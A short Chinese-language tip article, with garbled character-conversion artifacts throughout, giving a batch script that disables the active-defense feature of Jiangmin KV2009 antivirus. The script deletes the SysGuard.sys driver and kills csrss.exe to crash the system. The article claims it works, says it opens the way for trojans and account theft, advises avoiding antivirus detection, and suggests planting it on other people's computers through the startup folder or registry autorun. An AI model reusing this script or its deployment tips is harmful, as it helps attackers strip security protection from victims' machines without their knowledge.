牧馬人
現(xiàn)在主動防御功能實在是太火了,所以很多殺毒軟件都加入了這個功能,江民KV系列的殺毒軟件當然也不例外。但是,利用文本編輯軟件新建一個*.bat批處理文件,輸入下面這段代碼后保存并運行,就可以輕松干掉江民殺毒軟件KV2009的主動防御功能了(如圖)。
@echo off
del %systemroot%system32driversSysGuard.sys /f /q /s
set app_name=csrss.exe
echo 查找進程%app_name%,準備死機...
(tasklist /nh | findstr /i %app_name%) || (goto dead)
:dead
ntsd -c -q -pn %app_name%
我在虛擬機和本地系統(tǒng)中分別進行了試驗,發(fā)現(xiàn)這段代碼非常管用。它的意思非常簡單:首先是刪除江民殺毒軟件中的一個驅(qū)動文件,接著強制結(jié)束一個系統(tǒng)文件的進程,造成操作系統(tǒng)死機(之所以要強制死機,是因為殺毒軟件的自我保護功能不允許系統(tǒng)非正常地重新啟動)。當重新啟動后,江民殺毒軟件的主動防御功能就失效了,這樣黑客就能比較容易地向用戶的電腦中植入木馬、竊取賬號……
如果你是江民殺毒軟件的用戶,那么此招不得不防,最好經(jīng)常檢查其主動防御功能的工作狀態(tài),不然電腦被黑客入侵了都還不知道。
1.在試驗前,一定要把江民殺毒軟件的SysGuard.sys驅(qū)動文件拷貝到其他地方進行備份。因為如果試驗成功了,那么江民殺毒軟件的主動防御功能就徹底失效了,要想讓它恢復就得把備份的SysGuard.sys驅(qū)動文件拷貝回去,再重新啟動。
2.最好不要把*.bat放在可執(zhí)行文件里,因為這樣在運行時十有八九會被殺毒軟件攔截。
3.在別人的電腦上進行試驗時,可把*.bat放在啟動文件夾中,或采用修改注冊表的方式讓它自動運行。